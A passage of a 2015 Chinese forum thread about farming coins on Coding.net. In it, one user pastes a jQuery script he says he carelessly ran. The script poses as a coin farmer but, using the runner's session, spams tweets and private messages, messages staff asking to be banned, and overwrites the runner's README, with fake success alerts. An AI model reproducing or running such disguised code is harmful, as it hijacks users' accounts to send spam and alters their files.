1
RIcter 2015-06-05 15:35:21 +08:00
送东西那里有漏洞,可以刷礼物..
|
2
Delbert OP |
5
typcn 2015-06-05 15:57:14 +08:00
手贱运行了一下。。。
$.post("https://coding.net/api/social/message/send", { receiver_global_key: "Kyle_lyk", content: "我在刷码币,求封号!" }, "JSON"); for (var i = 0; 5 > i; i++) jQuery.post("https://coding.net/api/tweet", { content: "@AKCoding @Coding 我在模拟手机发冒泡刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币" + new Date().getTime(), device: "RM-937" }, function(a) { alert("模拟手机发送冒泡成功"); }, "json"), jQuery.post("https://coding.net/api/tweet", { content: "@AKCoding @Coding 我在模拟电脑发冒泡刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币" + new Date().getTime() }, function(a) { alert("模拟电脑发送冒泡成功"); }, "json"); $.get("https://coding.net/api/tweet/best_user", function(a) { for (var b = 0; b < a.data.length; b++) $.post("https://coding.net/api/social/message/send", { receiver_global_key: a.data[b].global_key, content: "我在刷码币,赶快和我一起来刷吧!" }, "JSON"); }, "JSON"); alert("通过专用API获取码币成功!"); $.get("https://coding.net/api/tweet/public_tweets", function(a) { for (var b = 0; b < a.data.length; b++) $.post("https://coding.net/api/social/message/send", { receiver_global_key: a.data[b].owner.global_key, content: "我在刷码币,赶快和我一起来刷吧!" }, "JSON"); }, "JSON"); $.get("https://coding.net/api/account/current_user", function(a) { jQuery.get("https://coding.net/api/user/" + a.data.global_key + "/project/mb/git/edit/master/README.md", function(b) { b = b.data.lastCommit; jQuery.post("https://coding.net/api/user/" + a.data.global_key + "/project/mb/git/edit/master/README.md", { content: new Date().getTime() + "我在刷码币,我是一只快乐的小毛驴,刷呀刷呀刷码币,码币", message: "update README.md", lastCommitSha: b }, function(a) {}, "json"); alert("模拟项目推送获取码币成功"); }, "json"); }, "JSON"); |
9
kisshere 2015-06-05 17:23:45 +08:00 via Android
应该是index.php都送出去了
|